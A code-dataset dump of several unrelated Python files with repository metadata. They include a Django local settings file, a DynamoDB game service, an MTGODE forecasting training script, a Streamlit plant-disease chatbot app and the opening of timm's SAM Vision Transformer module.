print(resultStr)","repo_name":"Liangjianghao/bili","sub_path":"dataDeal/numberCount.py","file_name":"numberCount.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17240271143","text":"# -*- coding: utf-8 -*-\nfrom leva_api.settings.base import *\n\nDEBUG = True\nTHUMBNAIL_DEBUG = True\n\nBASE_URL = 'http://127.0.0.1:8000/'\nCLIENT_BASE_URL = 'http://127.0.0.1:4200/'\nALLOWED_HOSTS = ['*', ]\n\nBASE_PATH = \"/var/www/leva_api/\"\n\nTHIRD_PARTY_APPS += [\n 'debug_toolbar',\n 'django_extensions',\n]\n\nINSTALLED_APPS = INSTALLED_APPS + THIRD_PARTY_APPS + PROJECT_APPS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'leva',\n 'USER': 'leva_user',\n 'PASSWORD': 'root',\n 'HOST': '127.0.0.1',\n 'PORT': '5432'\n }\n}\n","repo_name":"levon2111/leva_api","sub_path":"leva_api/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14944630453","text":"import random\nimport string\nfrom typing import Dict, Optional, TypedDict\n\nfrom mypy_boto3_dynamodb.service_resource import Table\n\nfrom entities.base_entity import (\n Entity,\n EntityRepository,\n EntityService,\n RawEntity,\n)\nfrom entities.custom_types import USER_ENTITY_PREFIX, GameSide, GameStatus\nfrom entities.game_user_relation import GameUserRelation, GameUserService\nfrom entities.user_game_relation import UserGameRelation, UserGameService\nfrom game_state import append_action_to_state\nfrom utils import get_time\n\n\nclass GameInformation(TypedDict):\n State: str\n Status: int\n StartTime: int\n UpdateTime: int\n ASideConnections: Dict[str, str]\n BSideConnections: Dict[str, str]\n GuestConnections: Dict[str, str]\n\n\nclass RawGameEntity(RawEntity, GameInformation):\n pass\n\n\nclass GameEntity(Entity, GameInformation):\n GameId: str\n\n\nclass GameRepository(EntityRepository[RawGameEntity, GameEntity]):\n \"\"\"\n Repository class for game entities with key schema:\n PK: Game_[GAME_ID]\n SK: Game_[GAME_ID]\n Entity primary key field name: GameId\n \"\"\"\n\n def __init__(\n self,\n table: Table,\n ) -> None:\n super().__init__(\n table, prefix=USER_ENTITY_PREFIX, entity_pk_field=\"GameId\"\n )\n\n\nclass GameService(EntityService[GameEntity]):\n def __init__(\n self,\n repository: GameRepository,\n user_game_service: UserGameService,\n game_user_service: GameUserService,\n ):\n super().__init__(repository)\n self._user_game_service = user_game_service\n self._game_user_service = game_user_service\n self._id_alphabet = string.ascii_letters + string.digits\n\n def create_new_game(\n self, game_id: Optional[str], username: str, user_connection_id: str\n ) -> GameEntity:\n if game_id is None:\n game_id = self._generate_game_id()\n\n if self.exists_by_key(game_id):\n raise Exception(\"Game item with id=%s already exists\" % game_id)\n\n current_time = get_time()\n\n new_entity = GameEntity(\n GameId=game_id,\n State=\"\",\n Status=GameStatus.STARTED.value,\n StartTime=current_time,\n UpdateTime=current_time,\n ASideConnections={username: user_connection_id},\n BSideConnections=dict(),\n GuestConnections=dict(),\n )\n self._repository.save(new_entity)\n\n user_game_relation = UserGameRelation(\n Username=username,\n GameId=game_id,\n GameStatus=GameStatus.STARTED.value,\n GameSide=GameSide.A.value,\n StartTime=current_time,\n JoinTime=current_time,\n )\n self._user_game_service.save(user_game_relation)\n\n game_user_relation = GameUserRelation(\n GameId=game_id, Username=username, JoinTime=current_time\n )\n self._game_user_service.save(game_user_relation)\n\n return new_entity\n\n def add_user_to_game_side(\n self,\n game_id: str,\n username: str,\n side: GameSide,\n user_connection_id: str,\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n current_time = get_time()\n\n game_entity[\"GuestConnections\"].pop(username, \"\")\n if side == GameSide.A:\n game_entity[\"ASideConnections\"][username] = user_connection_id\n else:\n game_entity[\"BSideConnections\"][username] = user_connection_id\n self._repository.save(game_entity)\n\n user_game_relation = UserGameRelation(\n Username=username,\n GameId=game_id,\n GameStatus=GameStatus.STARTED.value,\n GameSide=side.value,\n StartTime=game_entity[\"StartTime\"],\n JoinTime=current_time,\n )\n self._user_game_service.save(user_game_relation)\n\n game_user_relation = GameUserRelation(\n GameId=game_id, Username=username, JoinTime=current_time\n )\n self._game_user_service.save(game_user_relation)\n\n return game_entity\n\n def add_user_as_guest(\n self, game_id: str, username: str, user_connection_id: str\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n\n game_entity[\"GuestConnections\"][username] = user_connection_id\n self._repository.save(game_entity)\n\n return game_entity\n\n def append_state_action_to_game(\n self, game_id: str, state_action: str\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n game_entity[\"State\"] = append_action_to_state(\n game_entity[\"State\"], state_action\n )\n\n self._repository.save(game_entity)\n return game_entity\n\n def _generate_game_id(self) -> str:\n \"\"\"\n :return: a randomly generated game id string with 8 characters\n \"\"\"\n return \"\".join(random.choices(self._id_alphabet, k=8))\n","repo_name":"sikleber/Beerpongo","sub_path":"sys-src/backend/src/entities/game_entity.py","file_name":"game_entity.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"14040949230","text":"import argparse\nimport math\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom util import *\n# from trainer import Optim\nfrom model import MTGODE\n\n\ndef str_to_bool(value):\n if isinstance(value, bool):\n return value\n if value.lower() in {'false', 'f', '0', 'no', 'n'}:\n return False\n elif value.lower() in {'true', 't', '1', 'yes', 'y'}:\n return True\n raise ValueError(f'{value} is not a valid boolean value')\n\n\nparser = argparse.ArgumentParser(description='MTGODE')\n\n# general settings\nparser.add_argument('--expid', type=int, default=0, help='experiment id when saving best model')\nparser.add_argument('--runs', type=int, default=1, help='number of runs')\nparser.add_argument('--device', type=str, default='cuda:0')\nparser.add_argument('--data', type=str, default='../data/solar_AL.txt')\nparser.add_argument('--save', type=str, default='./save/', help='save path')\nparser.add_argument('--save_preds', type=str_to_bool, default=True, help='whether to save prediction results')\nparser.add_argument('--save_preds_path', type=str, default='./results/', help='predictions save path')\nparser.add_argument('--num_nodes', type=int, default=137, help='number of nodes/variables')\nparser.add_argument('--normalize', type=int, default=2, help='raw data normalization')\nparser.add_argument('--in_dim', type=int, default=1, help='inputs dimension')\nparser.add_argument('--seq_in_len', type=int, default=24*7, help='input sequence length')\nparser.add_argument('--seq_out_len', type=int, default=1, help='output sequence length')\nparser.add_argument('--horizon', type=int, default=3)\n\n# training related\nparser.add_argument('--epochs', type=int, default=40, help='')\nparser.add_argument('--batch_size', type=int, default=4, help='batch size')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate')\nparser.add_argument('--weight_decay', type=float, default=0.00001, help='weight decay rate')\nparser.add_argument('--lr_decay', type=str_to_bool, default=False, help='whether to decrease lr during training')\nparser.add_argument('--lr_decay_steps', type=str, default='20,40', help='lr decay at these steps')\nparser.add_argument('--lr_decay_rate', type=float, default=0.5, help='how much lr will decay')\nparser.add_argument('--dropout', type=float, default=0.3, help='dropout rate')\nparser.add_argument('--clip', type=int, default=5, help='clip')\nparser.add_argument('--L1Loss', type=str_to_bool, default=True, help='whether to use L1loss as criterion')\nparser.add_argument('--optim', type=str, default='adam')\n\n# model related\nparser.add_argument('--buildA_true', type=str_to_bool, default=True, help='whether to construct adaptive adjacency matrix')\nparser.add_argument('--subgraph_size', type=int, default=20, help='k')\nparser.add_argument('--tanhalpha', type=float, default=3, help='tanh alpha')\nparser.add_argument('--node_dim', type=int, default=40, help='dim of nodes')\nparser.add_argument('--num_split', type=int, default=1, help='number of splits for graphs')\nparser.add_argument('--step_size', type=int, default=100, help='step_size')\nparser.add_argument('--dilation_exponential', type=int, default=2, help='dilation exponential')\nparser.add_argument('--conv_channels', type=int, default=64, help='convolution channels')\nparser.add_argument('--end_channels', type=int, default=64, help='end channels')\nparser.add_argument('--solver_1', type=str, default='euler', help='CTA Solver')\nparser.add_argument('--time_1', type=float, default=1.0, help='CTA integration time')\nparser.add_argument('--step_1', type=float, default=0.167, help='CTA step size')\nparser.add_argument('--solver_2', type=str, default='euler', help='CGP Solver')\nparser.add_argument('--time_2', type=float, default=1.0, help='CGP integration time')\nparser.add_argument('--step_2', type=float, default=0.25, help='CGP step size')\nparser.add_argument('--alpha', type=float, default=2.0, help='CGP alpha to control eigenvalues range: [0, alpha]')\nparser.add_argument('--rtol', type=float, default=1e-4, help='rtol')\nparser.add_argument('--atol', type=float, default=1e-3, help='atol')\nparser.add_argument('--adjoint', type=str_to_bool, default=False, help='whether to use adjoint method')\nparser.add_argument('--perturb', type=str_to_bool, default=False, help='')\n\nargs = parser.parse_args()\ndevice = torch.device(args.device)\ntorch.set_num_threads(4)\n\nprint(args)\n\n\ndef evaluate(data, X, Y, model, evaluateL2, evaluateL1, batch_size, runid, save_prediction=False):\n model.eval()\n total_loss = 0\n total_loss_l1 = 0\n n_samples = 0\n predict = None\n test = None\n\n for X, Y in data.get_batches(X, Y, batch_size, False):\n X = torch.unsqueeze(X,dim=1)\n X = X.transpose(2,3)\n with torch.no_grad():\n output = model(X)\n # RESET NFE\n model.ODE.odefunc.nfe = 0 # reset CTA nfe\n model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe = 0 # reset CGP 1 nfe\n model.ODE.odefunc.stnet.gconv_2.CGPODE.odefunc.nfe = 0 # reset CGP 2 nfe\n output = torch.squeeze(output)\n if len(output.shape)==1:\n output = output.unsqueeze(dim=0)\n if predict is None:\n predict = output\n test = Y\n else:\n predict = torch.cat((predict, output))\n test = torch.cat((test, Y))\n\n scale = data.scale.expand(output.size(0), data.m)\n total_loss += evaluateL2(output * scale, Y * scale).item()\n total_loss_l1 += evaluateL1(output * scale, Y * scale).item()\n n_samples += (output.size(0) * data.m)\n\n rse = math.sqrt(total_loss / n_samples) / data.rse\n rae = (total_loss_l1 / n_samples) / data.rae\n\n all_preds = predict\n all_reals = test.data\n predict = predict.data.cpu().numpy()\n Ytest = test.data.cpu().numpy()\n sigma_p = (predict).std(axis=0)\n sigma_g = (Ytest).std(axis=0)\n mean_p = predict.mean(axis=0)\n mean_g = Ytest.mean(axis=0)\n index = (sigma_g != 0)\n correlation = ((predict - mean_p) * (Ytest - mean_g)).mean(axis=0) / (sigma_p * sigma_g)\n correlation = (correlation[index]).mean()\n\n if save_prediction:\n all_preds = all_preds * data.scale.expand(all_preds.size(0), data.m)\n all_reals = all_reals * data.scale.expand(all_reals.size(0), data.m)\n all_preds = all_preds.data.cpu().numpy()\n all_reals = all_reals.data.cpu().numpy()\n print(all_preds.shape)\n print(all_reals.shape)\n np.save(args.save_preds_path + args.data.replace('data/', '').replace('.txt', '') + \"_horizon\" + str(args.horizon)\n + \"_exp\" + str(args.expid) + \"_\" + str(runid) + \"_pred.npy\", all_preds)\n np.save(args.save_preds_path + args.data.replace('data/', '').replace('.txt', '') + \"_horizon\" + str(args.horizon)\n + \"_exp\" + str(args.expid) + \"_\" + str(runid) + \"_true.npy\", all_reals)\n\n return rse, rae, correlation\n\n\ndef train(data, X, Y, model, criterion, optim, batch_size, clip=None):\n model.train()\n total_loss = 0\n n_samples = 0\n iter = 0\n for X, Y in data.get_batches(X, Y, batch_size, True):\n optim.zero_grad()\n X = torch.unsqueeze(X,dim=1)\n X = X.transpose(2, 3)\n if iter % args.step_size == 0:\n perm = np.random.permutation(range(args.num_nodes))\n num_sub = int(args.num_nodes / args.num_split)\n\n for j in range(args.num_split):\n if j != args.num_split - 1:\n id = perm[j * num_sub:(j + 1) * num_sub]\n else:\n id = perm[j * num_sub:]\n id = torch.LongTensor(id).to(device)\n tx = X[:, :, id, :]\n ty = Y[:, id] # (B, N)\n output = model(tx, id)\n output = torch.squeeze(output) # (B, N)\n\n # GET/RESET NFE\n nfe_1 = model.ODE.odefunc.nfe # get CTA nfe\n nfe_2 = model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe // nfe_1 # get CPG nfe\n model.ODE.odefunc.nfe = 0 # reset CTA nfe\n model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe = 0 # reset CGP 1 nfe\n model.ODE.odefunc.stnet.gconv_2.CGPODE.odefunc.nfe = 0 # reset CGP 2 nfe\n\n scale = data.scale.expand(output.size(0), data.m) # (B, N)\n scale = scale[:,id]\n\n loss = criterion(output * scale, ty * scale)\n loss.backward()\n total_loss += loss.item()\n n_samples += (output.size(0) * data.m)\n\n if clip is not None:\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optim.step()\n\n if iter % 100 == 0:\n print('iter:{:3d} | lr {:.6f} | loss: {:.3f} | CTA nfe:{:2d} | CGP nfe:{:2d}'\n .format(iter, optim.param_groups[0]['lr'], loss.item()/(output.size(0) * data.m), nfe_1, nfe_2), flush=True)\n\n iter += 1\n\n return total_loss / n_samples\n\n\ndef main(runid):\n\n # train 60%, valid 20%, test 20%\n Data = DataLoaderS(args.data, 0.6, 0.2, device, args.horizon, args.seq_in_len, args.normalize)\n\n model = MTGODE(buildA_true=args.buildA_true, num_nodes=args.num_nodes, device=device,\n dropout=args.dropout, subgraph_size=args.subgraph_size, node_dim=args.node_dim,\n dilation_exponential=args.dilation_exponential, conv_channels=args.conv_channels,\n end_channels=args.end_channels, seq_length=args.seq_in_len, in_dim=args.in_dim,\n out_dim=args.seq_out_len, tanhalpha=args.tanhalpha, method_1=args.solver_1, time_1=args.time_1,\n step_size_1=args.step_1, method_2=args.solver_2, time_2=args.time_2, step_size_2=args.step_2,\n alpha=args.alpha, rtol=args.rtol, atol=args.atol, adjoint=args.adjoint, perturb=args.perturb,\n ln_affine=False).to(device)\n\n print('The recpetive field size is', model.receptive_field)\n nParams = sum([p.nelement() for p in model.parameters()])\n print('Number of model parameters is', nParams, flush=True)\n\n if args.L1Loss:\n criterion = nn.L1Loss(size_average=False).to(device)\n else:\n criterion = nn.MSELoss(size_average=False).to(device)\n\n evaluateL2 = nn.MSELoss(size_average=False).to(device)\n evaluateL1 = nn.L1Loss(size_average=False).to(device)\n\n best_val = 10000000\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n if args.lr_decay:\n lr_decay_steps = args.lr_decay_steps.split(',')\n lr_decay_steps = [int(i) for i in lr_decay_steps]\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=lr_decay_steps, gamma=args.lr_decay_rate)\n\n # At any point you can hit Ctrl + C to break out of training early.\n try:\n print('begin training')\n for epoch in range(1, args.epochs + 1):\n epoch_start_time = time.time()\n train_loss = train(Data, Data.train[0], Data.train[1], model, criterion, optimizer, args.batch_size,\n args.clip)\n val_loss, val_rae, val_corr = evaluate(Data, Data.valid[0], Data.valid[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n print(\n '| end of epoch {:3d} | time: {:5.2f}s | train_loss {:5.4f} | valid rse {:5.4f} | valid rae {:5.4f} | valid corr {:5.4f}'.format(\n epoch, (time.time() - epoch_start_time), train_loss, val_loss, val_rae, val_corr), flush=True)\n\n # Save the model if the validation loss is the best we've seen so far.\n if val_loss < best_val:\n torch.save(model, args.save + args.data.replace('data/', '').replace('.txt', '') +\n \"_exp\" + str(args.expid) + \"_\" + str(runid) + \".pt\")\n best_val = val_loss\n\n if epoch % 5 == 0:\n test_acc, test_rae, test_corr = evaluate(Data, Data.test[0], Data.test[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n print(\"test rse {:5.4f} | test rae {:5.4f} | test corr {:5.4f}\".format(test_acc, test_rae, test_corr), flush=True)\n\n if args.lr_decay:\n scheduler.step()\n\n except KeyboardInterrupt:\n print('-' * 89)\n print('Exiting from training early')\n\n # Load the best saved model.\n model = torch.load(args.save + args.data.replace('data/', '').replace('.txt', '') + \"_exp\" + str(args.expid) +\n \"_\" + str(runid) + \".pt\")\n\n vtest_acc, vtest_rae, vtest_corr = evaluate(Data, Data.valid[0], Data.valid[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n test_acc, test_rae, test_corr = evaluate(Data, Data.test[0], Data.test[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid, save_prediction=args.save_preds)\n print(\"final test rse {:5.4f} | test rae {:5.4f} | test corr {:5.4f}\".format(test_acc, test_rae, test_corr))\n\n return vtest_acc, vtest_rae, vtest_corr, test_acc, test_rae, test_corr\n\n\nif __name__ == \"__main__\":\n vacc = []\n vrae = []\n vcorr = []\n acc = []\n rae = []\n corr = []\n for i in range(args.runs):\n val_acc, val_rae, val_corr, test_acc, test_rae, test_corr = main(i)\n vacc.append(val_acc)\n vrae.append(val_rae)\n vcorr.append(val_corr)\n acc.append(test_acc)\n rae.append(test_rae)\n corr.append(test_corr)\n print('\\n\\n')\n print('multiple runs average')\n print('\\n\\n')\n print(\"valid\\trse\\trae\\tcorr\")\n print(\"mean\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.mean(vacc), np.mean(vrae), np.mean(vcorr)))\n print(\"std\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.std(vacc), np.std(vrae), np.std(vcorr)))\n print('\\n\\n')\n print(\"test\\trse\\trae\\tcorr\")\n print(\"mean\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.mean(acc), np.mean(rae), np.mean(corr)))\n print(\"std\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.std(acc), np.std(rae), np.std(corr)))","repo_name":"GRAND-Lab/MTGODE","sub_path":"run_single_step.py","file_name":"run_single_step.py","file_ext":"py","file_size_in_byte":14050,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"76"} +{"seq_id":"71303851766","text":"import streamlit as st\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport openai\r\nimport re\r\nfrom langchain.agents import load_tools, initialize_agent, AgentType\r\nfrom langchain.memory import ConversationBufferMemory\r\nfrom langchain.chat_models import ChatOpenAI\r\nfrom langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper\r\nfrom langchain.prompts import PromptTemplate, StringPromptTemplate\r\nfrom PIL import Image\r\nimport os\r\n\r\n\r\n\r\n# Input fields for OpenAI API key and Wolfram Alpha API key\r\napi_key = st.sidebar.text_input('Enter your OpenAI API key', type=\"password\")\r\nwolfram_key = st.sidebar.text_input('Enter your Wolfram Alpha API key',type=\"password\")\r\n\r\n# Initialize a warning message\r\nwarning_message = \"\"\r\n\r\n# Check if both API keys are not provided\r\nif not api_key and not wolfram_key:\r\n warning_message = \"Please enter both your OpenAI API key and Wolfram Alpha API key.\"\r\n\r\n# Check if OpenAI API key is provided but Wolfram Alpha API key is missing\r\nelif api_key and not wolfram_key:\r\n warning_message = \"Please enter your Wolfram Alpha API key.\"\r\n\r\n# Check if Wolfram Alpha API key is provided but OpenAI API key is missing\r\nelif not api_key and wolfram_key:\r\n warning_message = \"Please enter your OpenAI API key.\"\r\n\r\n# Display the warning message, if any\r\nif warning_message:\r\n st.sidebar.warning(warning_message)\r\nelse:\r\n # Both keys provided, store them in environment variables\r\n os.environ[\"OPENAI_API_KEY\"] = api_key\r\n openai.api_key = api_key\r\n os.environ[\"WOLFRAM_ALPHA_APPID\"] = wolfram_key\r\n# Initialize conversation memory\r\nconversation_memory = []\r\n\r\nprediction=\"\"\r\n\r\n# Define class labels for each model\r\nclass_labels = {\r\n 'Potato Model': ['Potato___Early_blight', 'Potato___Late_blight', 'Potato___healthy'],\r\n 'Pepper Model': ['Pepper__bell___Bacterial_spot', 'Pepper__bell___healthy'],\r\n 'Tomato Model': [\r\n 'Tomato_Bacterial_spot',\r\n 'Tomato_Early_blight',\r\n 'Tomato_Late_blight',\r\n 'Tomato_Leaf_Mold',\r\n 'Tomato_Septoria_leaf_spot',\r\n 'Tomato_Spider_mites_Two_spotted_spider_mite',\r\n 'Tomato__Target_Spot',\r\n 'Tomato__Tomato_YellowLeaf__Curl_Virus',\r\n 'Tomato__Tomato_mosaic_virus',\r\n 'Tomato_healthy'\r\n ]\r\n}\r\n\r\n# Define model paths\r\nmodel_paths = {\r\n 'Potato Model': 'potato.tflite',\r\n 'Pepper Model': 'pepper.tflite',\r\n 'Tomato Model': 'tomato.tflite'\r\n}\r\n\r\n# Helper function for model inference\r\ndef preprocess_image(image, target_size=(224, 224)):\r\n image = image.resize(target_size)\r\n image = np.array(image)\r\n image = (image.astype('float32') / 255.0)\r\n return image\r\n\r\ndef predict(image, model, class_labels):\r\n image = preprocess_image(image)\r\n image = np.expand_dims(image, axis=0)\r\n\r\n model.set_tensor(model.get_input_details()[0]['index'], image)\r\n model.invoke()\r\n output = model.get_tensor(model.get_output_details()[0]['index'])\r\n predicted_class = class_labels[np.argmax(output)]\r\n return predicted_class\r\n\r\n# Set your OpenAI API key\r\nopenai.api_key = api_key\r\n\r\n\r\n# Create two columns\r\ncol1, col2 = st.columns(2)\r\n\r\n# Add content to the first column\r\nwith col1:\r\n st.title('CROPGUARD : Your Friendly Neighbourhood Plant Disease Detector ')\r\n# Add content to the second column\r\nwith col2:\r\n st.image(\"855c4f3b09f2454eaebbb3baacb982b2.gif\", use_column_width=True)\r\nst.session_state.sidebar_state = 'expanded'\r\n# Streamlit app\r\n\r\nst.warning(\"Note: Only diseases listed in the class labels can be predicted, i.e. Potato Early Blight, Potato Late Blight, Bell Pepper bacterial spot, Tomato Bacterial Spot, Tomato Early Blight, Tomato late Blight, Tomato Leaf Mold, Tomato Septorial Leaf Spot, Tomato Spider Mites Two spotted spider mites, Tomato target spot, Tomato yellow leaf curl virus, Tomato Mosaic virus.\")\r\n\r\n\r\n\r\n# User selects the model\r\nselected_model = st.selectbox('Select a Model', list(model_paths.keys()))\r\nst.session_state.selected_model = selected_model\r\n\r\n# Load the chosen model\r\nmodel_path = model_paths[selected_model]\r\nmodel = tf.lite.Interpreter(model_path=model_path)\r\nmodel.allocate_tensors()\r\n\r\nuploaded_image = st.file_uploader(\"Choose an image...\", type=[\"jpg\", \"png\", \"jpeg\"])\r\n\r\nif uploaded_image is not None:\r\n st.image(uploaded_image, caption='Uploaded Image', use_column_width=True)\r\n image = Image.open(uploaded_image)\r\n predicted_class = predict(image, model, class_labels[selected_model])\r\n prediction=predicted_class\r\n if st.button('Detect'):\r\n # Set the sidebar visibility to True when \"Detect\" is clicked\r\n st.session_state.sidebar_state = 'expanded'\r\n st.sidebar.title('Results')\r\n st.sidebar.write(f'Predicted Class ({selected_model}): {predicted_class}')\r\n\r\n# Initialize conversation history file path\r\nconversation_history_file = \"conversation_history.txt\"\r\n\r\ntemplate = \"\"\"Given the plant disease , greet them first and then write the cause , cure and symptoms of the plant diease.\r\nspeak in a friendly ay without uneccesary technical words.\r\nYour response:\"\"\"\r\nprompt = PromptTemplate.from_template(template)\r\n\r\n# State for controlling conversation\r\nif st.checkbox(\"Start Conversation\"):\r\n st.session_state.sidebar_state = 'expanded'# Initialize detected disease variable\r\n\r\n st.sidebar.write(f\"Predicted Disease for the uploaded plant : {prediction}\")\r\n with st.form(key='conversation_form'):\r\n user_question = st.text_input(\"Ask a question about the disease or crop (type 'Disease {predicted_disease}'):\", key=\"my\")\r\n submit_button = st.form_submit_button(\"Submit\")\r\n\r\n # Define ChatOpenAI agent for question-answering\r\n llm = ChatOpenAI(openai_api_key=openai.api_key, temperature=0.7, prompt=prompt) # Adjust the temperature as needed\r\n tools = load_tools(['wikipedia', 'wolfram-alpha'], llm=llm)\r\n memory = ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\r\n\r\n # Define Agent\r\n agent = initialize_agent(tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,\r\n verbose=True, memory=memory, max_iterations=6 )\r\n\r\n if user_question:\r\n try:\r\n if submit_button:\r\n # Retrieve answer using ChatOpenAI based on the conversation history\r\n \r\n # Create a list of messages for the conversation\r\n messages = [ {\"role\": \"system\", \"content\": \"You are a conversational agent. You give information on the cause , cure and symptoms of the plant diease.\"}, {\"role\": \"user\", \"content\": user_question}\r\n ]\r\n\r\n try:\r\n # Use OpenAI's Chat API to get a response\r\n response = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo\",\r\n messages=messages\r\n )\r\n\r\n # Extract the assistant's reply\r\n assistant_response = response['choices'][0]['message']['content']\r\n\r\n # Print the assistant's response\r\n st.write(\"CropGuard :\")\r\n st.write(assistant_response)\r\n print(assistant_response)\r\n\r\n # Save the conversation history\r\n conversation_memory.append({\"role\": \"user\", \"content\": user_question})\r\n conversation_memory.append({\"role\": \"assistant\", \"content\": assistant_response})\r\n\r\n # Check if the conversation history file exists\r\n if os.path.exists(conversation_history_file):\r\n # Append the conversation to the existing file\r\n with open(conversation_history_file, \"a\") as file:\r\n for item in conversation_memory:\r\n file.write(f\"{item['role']}: {item['content']}\\n\")\r\n else:\r\n # Create a new file and write the conversation history to it\r\n with open(conversation_history_file, \"w\") as file:\r\n for item in conversation_memory:\r\n file.write(f\"{item['role']}: {item['content']}\\n\")\r\n\r\n\r\n except Exception as e:\r\n # Handle exceptions\r\n if \"Could not parse LLM output:\" in str(e):\r\n info = str(e).removeprefix(\"Could not parse LLM output: `\").removesuffix(\"`\")\r\n else:\r\n raise Exception(str(e))\r\n st.error(f\"An error occurred: {info}\")\r\n\r\n\r\n except Exception as e:\r\n raise Exception(str(e))\r\n\r\nwith st.sidebar.expander(\"About CropGuard\"):\r\n st.title(\"About CropGuard\")\r\n st.write(\"CropGuard is your friendly neighborhood plant disease detector.\")\r\n st.write(\"It uses machine learning models to identify diseases in plants, such as potatoes, peppers, and tomatoes.\")\r\n st.write(\"Simply upload an image of a plant, and CropGuard will predict the disease it might have.\")\r\n st.write(\"Additionally, you can have a conversation with CropGuard to learn more about the disease, its causes, cures, and symptoms.\")\r\n st.write(\"CropGuard is designed to provide information in a friendly and understandable way.\")\r\n st.write(\"If you have any questions or feedback, please feel free to reach out to us.\")\r\n st.write(\"Thank you for using CropGuard!\")\r\n\r\n# Add a button to download the conversation history file\r\n# Add a button to download the conversation history file\r\nif st.sidebar.button(\"Download Conversation History\"):\r\n with open(conversation_history_file, \"r\") as file:\r\n history_text = file.read()\r\n st.download_button(\r\n label=\"Click to Download Conversation History\",\r\n data=history_text,\r\n key=\"download_conversation_history\",\r\n file_name=\"conversation_history.txt\",\r\n )\r\n\r\n \r\n\r\n","repo_name":"manasvimishra11/CropGuard","sub_path":"newapp.py","file_name":"newapp.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2757494061","text":"\"\"\" Vision Transformer (ViT) in PyTorch\n\nA PyTorch implement of Vision Transformers as described in:\n\n'Exploring Plain Vision Transformer Backbones for Object Detection'\n - https://arxiv.org/abs/2203.16527\n\n'Segment Anything Model (SAM)'\n - https://github.com/facebookresearch/segment-anything/\n\n\"\"\"\nimport logging\nfrom functools import partial\nfrom typing import Callable, Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch.jit import Final\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD\nfrom timm.layers import PatchEmbed, Mlp, DropPath, PatchDropout, LayerNorm2d, ClassifierHead, NormMlpClassifierHead,\\\n Format, resample_abs_pos_embed_nhwc, RotaryEmbeddingCat, apply_rot_embed_cat, to_2tuple, use_fused_attn\nfrom ._builder import build_model_with_cfg\nfrom ._manipulate import checkpoint_seq\nfrom ._registry import generate_default_cfgs, register_model\nfrom ._features_fx import register_notrace_function\n\n# model_registry will add each entrypoint fn to this\n__all__ = ['VisionTransformerSAM']\n\n\n_logger = logging.getLogger(__name__)\n\n\ndef get_rel_pos(q_size: int, k_size: int, rel_pos: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Get relative positional embeddings according to the relative positions of\n query and key sizes.\n Args:\n q_size (int): size of query q.\n k_size (int): size of key k.\n rel_pos (Tensor): relative position embeddings (L, C).\n\n Returns:\n Extracted positional embeddings according to relative positions.\n \"\"\"\n max_rel_dist = int(2 * max(q_size, k_size) - 1)\n # Interpolate rel pos if needed.\n if rel_pos.shape[0] != max_rel_dist:\n # Interpolate rel pos.\n rel_pos_resized = F.interpolate(\n rel_pos.reshape(1, rel_pos.shape[0], -1).permute(0, 2, 1),\n size=max_rel_dist,\n mode=\"linear\",\n )\n rel_pos_resized = rel_pos_resized.reshape(-1, max_rel_dist).permute(1, 0)\n else:\n rel_pos_resized = rel_pos\n\n # Scale the coords with short length if shapes for q and k are different.\n q_coords = torch.arange(q_size)[:, None] * max(k_size / q_size, 1.0)\n k_coords = torch.arange(k_size)[None, :] * max(q_size / k_size, 1.0)\n relative_coords = (q_coords - k_coords) + (k_size - 1) * max(q_size / k_size, 1.0)\n\n return rel_pos_resized[relative_coords.long()]\n\nregister_notrace_function(get_rel_pos)\n\n\ndef get_decomposed_rel_pos_bias(\n q: torch.Tensor,\n rel_pos_h: torch.Tensor,\n rel_pos_w: torch.Tensor,\n q_size: Tuple[int, int],\n k_size: Tuple[int, int],\n) -> torch.Tensor:\n \"\"\"\n Calculate decomposed Relative Positional Embeddings from :paper:`mvitv2`.\n https://github.com/facebookresearch/mvit/blob/19786631e330df9f3622e5402b4a419a263a2c80/mvit/models/attention.py\n Args:\n q (Tensor): query q in the attention layer with shape (B, q_h * q_w, C).\n rel_pos_h (Tensor): relative position embeddings (Lh, C) for height axis.\n rel_pos_w (Tensor): relative position embeddings (Lw, 